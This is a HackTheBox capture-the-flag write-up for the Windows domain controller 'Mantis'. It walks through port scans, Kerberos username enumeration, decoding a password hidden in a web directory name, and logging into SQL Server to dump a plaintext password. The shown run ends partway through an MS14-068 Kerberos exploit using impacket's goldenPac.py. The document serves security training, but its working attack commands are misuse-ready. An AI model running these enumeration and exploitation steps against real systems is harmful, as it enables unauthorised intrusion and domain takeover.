---
title: "HTB: Mantis"
date: 2021-07-10
classes: wide
categories:
  - Hackthebox
tag:
  - gobuster
  - base64
  - sql server
  - MS14-068
toc: true
---

<img src="{{ site.url }}{{ site.baseurl }}/assets/posts/2021/Mantis/Mantis.png" alt="">


# Summary 

Mantis was a box that revolved around finding a webserver on an obscure port and finding a directory that had the password as the directory name, where you base64 decode the directory string of characters and get a bunch of hex. You then input this string of characters as hex and get an sql server passsword for the admin user. A lot of the struggle from this machine was the priv esc aspect which revolved around a kerberos vulnerability which I'm not too sure how you were meant to find this vulnerability as there are not really any scripts to detect this vulnerability. Its all just guessing that this is vulnerable to this exploit it seemed. But without further or do lets get into the writeup for Mantis from hackthebox.

# Recon

```
┌─[purplerabbit@kali]─[~/Documents/htb/ad/mantis]
└──╼ $cat nmap/initial.txt 
# Nmap 7.91 scan initiated Mon Jul  5 16:46:35 2021 as: nmap -A -oN nmap/initial.txt 10.10.10.52
Nmap scan report for 10.10.10.52
Host is up (0.031s latency).
Not shown: 980 closed ports
PORT      STATE SERVICE      VERSION
53/tcp    open  domain       Microsoft DNS 6.1.7601 (1DB15CD4) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15CD4)
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2021-07-05 15:46:42Z)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds Windows Server 2008 R2 Standard 7601 Service Pack 1 microsoft-ds (workgroup: HTB)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
1433/tcp  open  ms-sql-s     Microsoft SQL Server 2014 12.00.2000.00; RTM
| ms-sql-ntlm-info: 
|   Target_Name: HTB
|   NetBIOS_Domain_Name: HTB
|   NetBIOS_Computer_Name: MANTIS
|   DNS_Domain_Name: htb.local
|   DNS_Computer_Name: mantis.htb.local
|_  Product_Version: 6.1.7601
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2021-07-05T15:46:30
|_Not valid after:  2051-07-05T15:46:30
|_ssl-date: 2021-07-05T15:47:47+00:00; -3s from scanner time.
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
8080/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Tossed Salad - Blog
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc        Microsoft Windows RPC
49167/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: MANTIS; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 47m57s, deviation: 1h47m20s, median: -3s
| ms-sql-info: 
|   10.10.10.52:1433: 
|     Version: 
|       name: Microsoft SQL Server 2014 RTM
|       number: 12.00.2000.00
|       Product: Microsoft SQL Server 2014
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| smb-os-discovery: 
|   OS: Windows Server 2008 R2 Standard 7601 Service Pack 1 (Windows Server 2008 R2 Standard 6.1)
|   OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
|   Computer name: mantis
|   NetBIOS computer name: MANTIS\x00
|   Domain name: htb.local
|   Forest name: htb.local
|   FQDN: mantis.htb.local
|_  System time: 2021-07-05T11:47:38-04:00
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2021-07-05T15:47:41
|_  start_date: 2021-07-05T15:44:59

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jul  5 16:47:51 2021 -- 1 IP address (1 host up) scanned in 76.48 seconds
```

All port scan 

```
┌─[purplerabbit@kali]─[~/Documents/htb/ad/mantis]
└──╼ $nmap -p- -oN nmap/all-ports --min-rate 10000 $ip 
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-05 16:48 BST
Warning: 10.10.10.52 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.52
Host is up (0.043s latency).
Not shown: 65478 closed ports, 30 filtered ports
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
1337/tcp  open  waste
1433/tcp  open  ms-sql-s
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5722/tcp  open  msdfsr
8080/tcp  open  http-proxy
9389/tcp  open  adws
47001/tcp open  winrm
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49157/tcp open  unknown
49158/tcp open  unknown
49167/tcp open  unknown
49178/tcp open  unknown
49182/tcp open  unknown
50255/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 13.41 seconds
```

# Enumerating services

## DNS 53

I used htb.local as that is what the domain was showing as in the ldap script in nmap

```
┌─[purplerabbit@kali]─[~/Documents/htb/ad/mantis]
└──╼ $nslookup
> server 10.10.10.52
Default server: 10.10.10.52
Address: 10.10.10.52#53
> 10.10.10.52
** server can't find 52.10.10.10.in-addr.arpa: SERVFAIL
> 127.0.0.1
1.0.0.127.in-addr.arpa  name = localhost.
> htb.local
Server:         10.10.10.52
Address:        10.10.10.52#53

Name:   htb.local
Address: 10.10.10.52
Name:   htb.local
Address: dead:beef::7d1f:9883:34f2:4332
Name:   htb.local
Address: dead:beef::91fd:88ca:a39c:e5a5
> mantis.htb.local
Server:         10.10.10.52
Address:        10.10.10.52#53

Name:   mantis.htb.local
Address: 10.10.10.52
Name:   mantis.htb.local
Address: dead:beef::91fd:88ca:a39c:e5a5

```

## RPC 135
Checking for null authentication was a dead end

```
┌─[✗]─[purplerabbit@kali]─[~/Documents/htb/ad/mantis]
└──╼ $rpcclient -U '' $ip
Enter WORKGROUP\'s password: 
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
```

## LDAP 389
LDAP gave nothing useful as anonymous authentication was disabled

```
┌─[✗]─[purplerabbit@kali]─[~/Documents/htb/ad/mantis]
└──╼ $ldapsearch -h $ip -x -s base namingcontexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts 
#

#
dn:
namingContexts: DC=htb,DC=local
namingContexts: CN=Configuration,DC=htb,DC=local
namingContexts: CN=Schema,CN=Configuration,DC=htb,DC=local
namingContexts: DC=DomainDnsZones,DC=htb,DC=local
namingContexts: DC=ForestDnsZones,DC=htb,DC=local

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1


┌─[purplerabbit@kali]─[~/Documents/htb/ad/mantis]
└──╼ $ldapsearch -h $ip -x -b "DC=htb,DC=local"
# extended LDIF
#
# LDAPv3
# base <DC=htb,DC=local> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#

# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C09075A, comment: In order to perform this opera
 tion a successful bind must be completed on the connection., data 0, v1db1

# numResponses: 1
```


## SMB 445

```
┌─[✗]─[purplerabbit@kali]─[~/Documents/htb/ad/mantis]
└──╼ $smbmap -H $ip
[+] IP: 10.10.10.52:445 Name: 10.10.10.52                                       
┌─[purplerabbit@kali]─[~/Documents/htb/ad/mantis]
└──╼ $smbclient -L //10.10.10.52/
Enter WORKGROUP\purplerabbit's password: 
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
SMB1 disabled -- no workgroup available
```

## HTTP 8080

So I added mantis.htb.local to my /etc/hosts file and ran gobuster against the webserver 

```
──╼ $/home/purplerabbit/Documents/gobuster-linux-amd64/gobuster dir -u http://$ip:8080/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x -o gobuster-main.txt -t 50 
===============================================================                                                                                                                               
Gobuster v3.1.0                                                                                                                                                                               
by OJ Reeves (@TheColonial) & purplerabbittian Mehlmauer (@firefart)                                                                                                                                 
===============================================================                                                                                                                               
[+] Url:                     http://10.10.10.52:8080/                                                                                                                                         
[+] Method:                  GET                                                                                                                                                              
[+] Threads:                 50                                                                                                                                                               
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt                                                                                                     
[+] Negative Status codes:   404                                                                                                                                                              
[+] User Agent:              gobuster/3.1.0                                                                                                                                                   
[+] Extensions:              -o                                                                                                                                                               
[+] Timeout:                 10s                                                                                                                                                              
===============================================================                                                                                                                               
2021/07/05 17:47:21 Starting gobuster in directory enumeration mode                                                                                                                           
===============================================================                                                                                                                               
/archive              (Status: 200) [Size: 2866]                                                                                                                                              
/blogs                (Status: 200) [Size: 2913]                                                                                                                                              
/admin                (Status: 302) [Size: 163] [--> /Users/Account/AccessDenied?ReturnUrl=%2Fadmin] 
/tags                 (Status: 200) [Size: 2453]                                                    
```

Looking at the webserver it was running orchard cms. Looking for vulnerabilities for orchard cms showed the following 

```
─[purplerabbit@kali]─[~/Documents/htb/ad/mantis]
└──╼ $searchsploit orchard 
------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                                                                                              |  Path
------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Orchard 1.3.9 - 'ReturnUrl' Open Redirection                                                                                                                | php/webapps/36493.txt
Orchard CMS 1.7.3/1.8.2/1.9.0 - Persistent Cross-Site Scripting                                                                                             | asp/webapps/37533.txt
Orchard Core RC1 - Persistent Cross-Site Scripting                                                                                                          | aspx/webapps/48456.txt
------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
```

I spent some time trying to post a comment thinking that it could be a cross site scripting vulnerability, but it wasn't

## Kerberos 88

So its possible to enumerate usernames of a domain using [kerbrute](https://github.com/ropnop/kerbrute)
```
┌─[✗]─[purplerabbit@kali]─[~/Documents/htb/ad/mantis]
└──╼ $~/Downloads/kerbrute_linux_amd64 userenum -d htb.local --dc $ip /opt/SecLists/Usernames/xato-net-10-million-usernames.txt

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 07/06/21 - Ronnie Flathers @ropnop

2021/07/06 16:01:27 >  Using KDC(s):
2021/07/06 16:01:27 >   10.10.10.52:88

2021/07/06 16:01:27 >  [+] VALID USERNAME:       james@htb.local
2021/07/06 16:01:29 >  [+] VALID USERNAME:       James@htb.local
2021/07/06 16:01:38 >  [+] VALID USERNAME:       administrator@htb.local
2021/07/06 16:01:46 >  [+] VALID USERNAME:       mantis@htb.local
2021/07/06 16:02:05 >  [+] VALID USERNAME:       JAMES@htb.local
2021/07/06 16:02:51 >  [+] VALID USERNAME:       Administrator@htb.local
2021/07/06 16:03:30 >  [+] VALID USERNAME:       Mantis@htb.local
```

Looking to see if these users have do not require pre authentication enabled using the script from Impacket GetNPUsers.py proved useless

```
┌─[✗]─[purplerabbit@kali]─[~/Documents/htb/ad/mantis]
└──╼ $GetNPUsers.py htb.local/ -usersfile users.txt -format hashcat -output hashes.asreproast -dc-ip 10.10.10.52
/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[-] User james doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] User mantis doesn't have UF_DONT_REQUIRE_PREAUTH set
```

Looking back at the ports, there was one unusual port 1337. Enumerating this port a little further using nmap showed that it was hosting a webserver

```
─[purplerabbit@kali]─[~/Documents/htb/ad/mantis]
└──╼ $nmap -A -p 1337 $ip
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-06 16:41 BST
Nmap scan report for mantis.htb (10.10.10.52)
Host is up (0.041s latency).

PORT     STATE SERVICE VERSION
1337/tcp open  http    Microsoft IIS httpd 7.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.46 seconds
```

Going over to this webpage showed a simple IIS7 picture

<img src="{{ site.url }}{{ site.baseurl }}/assets/posts/2021/Mantis/1.png" alt="">


I then ran gobuster on this webpage to see if we could find any interesting directories which found /secret_notes directory on this webserver. VIsiting this directory gave a listing of two other directories 

<img src="{{ site.url }}{{ site.baseurl }}/assets/posts/2021/Mantis/2.png" alt="">

Going over and looking at this dev_notes directory revealed text that reads:

```
1. Download OrchardCMS
2. Download SQL server 2014 Express ,create user "admin",and create orcharddb database
3. Launch IIS and add new website and point to Orchard CMS folder location.
4. Launch browser and navigate to http://localhost:8080
5. Set admin password and configure sQL server connection string.
6. Add blog pages with admin user.
```

However going at the bottom revealed credentials in binary form

<img src="{{ site.url }}{{ site.baseurl }}/assets/posts/2021/Mantis/3.png" alt="">

Using an online binary to text service gave the output of @dm!n_P@ssW0rd! trying this password to access the orchard portal as admin worked!

<img src="{{ site.url }}{{ site.baseurl }}/assets/posts/2021/Mantis/4.png" alt="">

Looking online to see if there was any way to upload a shell to orchard proved useless and looking for vulnerabilities for this version of orchard that was now showing in the admin portal 1.10.1.0

## Mssql 1433

At the the bottom of the file it reads "SQL Server sa credentials file namez" Looking at the directory name I noticed it had a string of characters after dev_notes. I copied this string of characters and did a base64 decode on it and it gave me another string of characters. 
```
─[purplerabbit@kali]─[~/Documents/htb/ad/mantis]
└──╼ $echo "NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx" | base64 -d                      
6d2424716c5f53405f504073735730726421
```
At first I thought this was somekind of hash. But doing a wc -l on these characters revealed that it wasn't a hash because a hash is typically 32 characters and this is 36

```
┌─[purplerabbit@kali]─[~/Documents/htb/ad/mantis]
└──╼ $echo -n "6d2424716c5f53405f504073735730726421" | wc -c
36
```

So this bit I was a little stuck on, but the string of characters here are actually just numbers and don't have any letters higher than f - this gives an indication that it could be hex. So running xxd with the postscript continuous hexdump style and the revert flag to have it input the string of characters as hex and output just the ascii that it outputs gives the password for the sql sa account

```
┌─[✗]─[purplerabbit@kali]─[~/Documents/htb/ad/mantis]
└──╼ $echo "6d2424716c5f53405f504073735730726421" | xxd -p -r
m$$ql_S@_P@ssW0rd!
```

Before this I tried to use "file" and "namez" as the password for the sa account but neither worked which made me think that it was the name of some file and guessed that it was the name of the directory I was in.

This next bit really did my head in because I was getting several errors using crackmapexec to attempt to execute code and impacket's mssqlclient.py script

```
┌─[purplerabbit@kali]─[~/Documents/htb/ad/mantis]
└──╼ $crackmapexec mssql -d mantis.local -u sa -p "m$$ql_S@_P@ssW0rd!" -x "whoami" 10.10.10.52
                      
MSSQL       10.10.10.52     1433   None             [*] None (name:10.10.10.52) (domain:mantis.local)
MSSQL       10.10.10.52     1433   None             [-] ERROR(MANTIS\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Windows authentication.
┌─[purplerabbit@kali]─[~/Documents/htb/ad/mantis]
└──╼ $crackmapexec mssql -d mantis.htb -u sa -p "m$$ql_S@_P@ssW0rd!" -x "whoami" 10.10.10.52
                      
MSSQL       10.10.10.52     1433   None             [*] None (name:10.10.10.52) (domain:mantis.htb)
MSSQL       10.10.10.52     1433   None             [-] ERROR(MANTIS\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Windows authentication.
```

```
┌─[✗]─[purplerabbit@kali]─[~/Documents/htb/ad/mantis]
└──╼ $mssqlclient.py  -windows-auth 'mantis/sa:m$$ql_S@_P@ssW0rd!'@10.10.10.52
/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Encryption required, switching to TLS
[-] ERROR(MANTIS\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Windows authentication.
┌─[purplerabbit@kali]─[~/Documents/htb/ad/mantis]
└──╼ $mssqlclient.py  -windows-auth 'htb/sa:m$$ql_S@_P@ssW0rd!'@10.10.10.52
/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Encryption required, switching to TLS
[-] ERROR(MANTIS\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Windows authentication.
┌─[purplerabbit@kali]─[~/Documents/htb/ad/mantis]
└──╼ $mssqlclient.py  -windows-auth 'htb.local/sa:m$$ql_S@_P@ssW0rd!'@10.10.10.52
/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Encryption required, switching to TLS
[-] ERROR(MANTIS\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Windows authentication.
```

Removing -windws-auth fixes the issue with the untrusted domain, but now it was saying that the credentials were invalid

```
┌─[purplerabbit@kali]─[~/Documents/htb/ad/mantis]
└──╼ $mssqlclient.py  'htb.local/sa:m$$ql_S@_P@ssW0rd!'@10.10.10.52
/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Encryption required, switching to TLS
[-] ERROR(MANTIS\SQLEXPRESS): Line 1: Login failed for user 'sa'.
```

After some time here I guessed that the sa user was incorrect and tried the admin as the user and got access to the sql service. However I didn't have permissions to enable xp_cmdshelll which would have allowed me to execute code as the sql service user
```
┌─[purplerabbit@kali]─[~/Documents/htb/ad/mantis]
└──╼ $mssqlclient.py  'htb.local/admin:m$$ql_S@_P@ssW0rd!'@10.10.10.52
/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: None, New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(MANTIS\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(MANTIS\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (120 7208) 
[!] Press help for extra shell commands
SQL> help

     lcd {path}                 - changes the current local directory to {path}
     exit                       - terminates the server process (and this session)
     enable_xp_cmdshell         - you know what it means
     disable_xp_cmdshell        - you know what it means
     xp_cmdshell {cmd}          - executes cmd using xp_cmdshell
     sp_start_job {cmd}         - executes cmd using the sql server agent (blind)
     ! {cmd}                    - executes a local shell cmd
     
SQL> enable_xp_cmdshell
[-] ERROR(MANTIS\SQLEXPRESS): Line 105: User does not have permission to perform this action.
[-] ERROR(MANTIS\SQLEXPRESS): Line 1: You do not have permission to run the RECONFIGURE statement.
[-] ERROR(MANTIS\SQLEXPRESS): Line 62: The configuration option 'xp_cmdshell' does not exist, or it may be an advanced option.
[-] ERROR(MANTIS\SQLEXPRESS): Line 1: You do not have permission to run the RECONFIGURE statement.
SQL> 
```
I then did a search of databases
```

SQL> SELECT name FROM master.sys.databases                                                                                                                                                    
name                                                                                                                                                                                 [230/597]
         
--------------------------------------------------------------------------------------------------------------------------------                                                                                                                                                                                                                                         
master                                                                                                                                                                               
tempdb                                                                                                                                                                                   
model                                                                                                                                                                                   
msdb                                                                                                                                                                                          
orcharddb 
```

Looking at the tables for the orcharddb gave a ton of output

```
SQL> SELECT                                                                                                                                                                                                                                   
  *                                                                                                                                                                                              
  orcharddb.INFORMATION_SCHEMA.TABLES;                                                                                                                                                                                                        
TABLE_CATALOG                                                                                                                      TABLE_SCHEMA                                                                                                                       TABLE_NAME                                                                                                                         TABLE_TYPE                                                                         
                                                         
--------------------------------------------------------------------------------------------------------------------------------   --------------------------------------------------------------------------------------------------------------------------------   --------------------------------------------------------------------------------------------------------------------------------   ----------                                                                         
       
orcharddb                                                                                                                          dbo                                                                                                                                blog_Orchard_Blogs_RecentBlogPostsPartRecord                                                                                       BASE TABLE                                                                         
        
orcharddb                                                                                                                          dbo                                                                                                                                blog_Orchard_Blogs_BlogArchivesPartRecord                                                                                          BASE TABLE                                                                         
                                                          
orcharddb                                                                                                                          dbo                                                                                                                                blog_Orchard_Workflows_TransitionRecord                                                                                            BASE TABLE                                                                         
                                                          
orcharddb                                                                                                                          dbo                                                                                                                                blog_Orchard_Workflows_WorkflowRecord                                                                                              BASE TABLE                                                                         
                                                                                                                                                                                                                                              
orcharddb                                                                                                                          dbo                                                                                                                                blog_Orchard_Workflows_WorkflowDefinitionRecord                                                                                    BASE TABLE                                                                         
                                                                                                                                                                                                                                              
orcharddb                                                                                                                          dbo                                                                                                                                blog_Orchard_Workflows_AwaitingActivityRecord                                                                                      BASE TABLE                                                                         
                                                                                                                                                                                                                                              
orcharddb                                                                                                                          dbo                                                                                                                                blog_Orchard_Workflows_ActivityRecord                                                                                              BASE TABLE                                                                         
                                                                                                                                                                                                                                              
orcharddb                                                                                                                          dbo                                                                                                                                blog_Orchard_Tags_TagsPartRecord                                                                                                   BASE TABLE                                                                         

---snipped---
```

Looking over the tables I saw one called blog_Orchard_Users_UserPartRecord doing a select on this table revealed Jame's password

```
SQL> select * from blog_Orchard_Users_UserPartRecord;
         Id   UserName                                                                                                                                                                                                                                                          Email                                                                                                                                                                                                                                                             NormalizedUserName                                                                                                                                                                                                                                                Password                                                                                                                                                                                                                                                          PasswordFormat                                                                                                                                                                                                                                                    HashAlgorithm                                                                                                                                                                                                                                                     PasswordSalt                                                                                                                                                                                                                                                      RegistrationStatus                                                                                                                                                                                                                                                EmailStatus                                                                                                                                                                                                                                                       EmailChallengeToken                                                                                                                                                                                                                                               CreatedUtc            LastLoginUtc          LastLogoutUtc         

-----------   ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------   ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------   ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------   ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------   ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------   ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------   ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------   ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------   ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------   ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------   -------------------   -------------------   -------------------   

          2   admin                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                               admin                                                                                                                                                                                                                                                             AL1337E2D6YHm0iIysVzG8LA76OozgMSlyOJk1Ov5WCGK+lgKY6vrQuswfWHKZn2+A==                                                                                                                                                                                              Hashed                                                                                                                                                                                                                                                            PBKDF2                                                                                                                                                                                                                                                            UBwWF1CQCsaGc/P7jIR/kg==                                                                                                                                                                                                                                          Approved                                                                                                                                                                                                                                                          Approved                                                                                                                                                                                                                                                          NULL                                                                                                                                                                                                                                                              2017-09-01 13:44:01   2021-07-07 08:33:29   2017-09-01 14:06:31   

         15   James                                                                                                                                                                                                                                                             james@htb.local                                                                                                                                                                                                                                                   james                                                                                                                                                                                                                                                             J@m3s_P@ssW0rd!                                                                                                                                                                                                                                                   Plaintext                                                                                                                                                                                                                                                         Plaintext                                                                                                                                                                                                                                                         NA                                                                                                                                                                                                                                                                Approved                                                                                                                                                                                                                                                          Approved                                                                                                                                                                                                                                                          NULL                                                                                                                                                                                                                                                              2017-09-01 13:45:44   NULL                  NULL 
```

And we get Jame's password J@m3s_P@ssW0rd!

We could have alternatively used dbeaver to browse through the sql server which can be installed using 

```
sudo apt-get install dbeaver
```
and then run using
```
dbeaver
```

However when I tried doing this I got a TLS version error that I couldn't seem to fix

# Shell as James

First I tried to see if I could access winrm and was unsuccessful 

```
┌─[purplerabbit@kali]─[~/Documents/htb/ad/mantis]
└──╼ $evil-winrm -u james -p J@m3s_P@ssW0rd! -i 10.10.10.52

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

Error: An error of type Errno::ECONNREFUSED happened, message is Connection refused - Connection refused - connect(2) for "10.10.10.52" port 5985 (10.10.10.52:5985)

Error: Exiting with code 1

┌─[✗]─[purplerabbit@kali]─[~/Documents/htb/ad/mantis]
└──╼ $evil-winrm -u james -p J@m3s_P@ssW0rd! -i 10.10.10.52 -P 47001

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

Error: An error of type WinRM::WinRMHTTPTransportError happened, message is Unable to parse authorization header. Headers: {"Server"=>"Microsoft-HTTPAPI/2.0", "Date"=>"Wed, 07 Jul 2021 13:14:32 GMT", "Connection"=>"close", "Content-Length"=>"0"}
Body:  (404).

Error: Exiting with code 1

┌─[✗]─[purplerabbit@kali]─[~/Documents/htb/ad/mantis]
└──╼ $evil-winrm -u james -p J@m3s_P@ssW0rd! -i 10.10.10.52 -P 47001 -S

Evil-WinRM shell v2.3

Warning: SSL enabled

Info: Establishing connection to remote endpoint

Error: An error of type Errno::ECONNREFUSED happened, message is Connection refused - Connection refused - connect(2) for "10.10.10.52" port 5986 (10.10.10.52:5986)

Error: Exiting with code 1
```

I then tried to see if there was write access to smb shares and there wasn't

```
┌─[✗]─[purplerabbit@kali]─[~/Documents/htb/ad/mantis]
└──╼ $smbmap -u james -p J@m3s_P@ssW0rd! -H $ip
[+] IP: 10.10.10.52:445 Name: mantis.htb                                        
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    NO ACCESS       Remote IPC
        NETLOGON                                                READ ONLY       Logon server share 
        SYSVOL                                                  READ ONLY       Logon server share 
```

		 
WIth the password for the sa user I was able to execute 

## RPC 

With this user I can now connect to rpc, but I couldn't get any useful information here, but was able to see that there was just the james user and the administrator user on this box

```
┌─[purplerabbit@kali]─[~/Documents/htb/ad/mantis]
└──╼ $rpcclient -U james 10.10.10.52
Enter WORKGROUP\james's password: 
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[james] rid:[0x44f]
```

However there was an unintentional method for rooting this box which was simply using psexec as james user. However I believe that hackthebox have since patched this unintentional method as I couldn't get this to work

```
┌─[purplerabbit@kali]─[~/Documents/htb/ad/mantis]
└──╼ $psexec.py htb.local/james@10.10.10.52 cmd.exe
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

Password:
[*] Requesting shares on 10.10.10.52.....
[-] share 'ADMIN$' is not writable.
[-] share 'C$' is not writable.
[-] share 'NETLOGON' is not writable.
[-] share 'SYSVOL' is not writable.
```

# James => Administrator
Moving onto the intended method of rooting this machine which was a little bit far fetched in my opinion and is probably the reason that this machine is rated as hard and I'm not too sure how to add this in my methodology because its not really something I typically do because you are meant to see that this domain controller is vulnerable to MS14-068. There unfortunately are not any scripts to detect this exploit. But the script from impacket goldenPac.py automate the exploitation of this vulnerability and give you a system shell

```
┌─[purplerabbit@kali]─[~/Documents/htb/ad/mantis]
└──╼ $goldenPac.py -dc-ip 10.10.10.52 -target-ip 10.10.10.52 htb.local/james@mantis.htb.local
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

Password:
[*] User SID: S-1-5-21-4220043660-4019079961-2895681657-1103
[*] Forest SID: S-1-5-21-4220043660-4019079961-2895681657
[*] Attacking domain controller 10.10.10.52
[*] 10.10.10.52 found vulnerable!
[*] Requesting shares on 10.10.10.52.....
[*] Found writable share ADMIN$
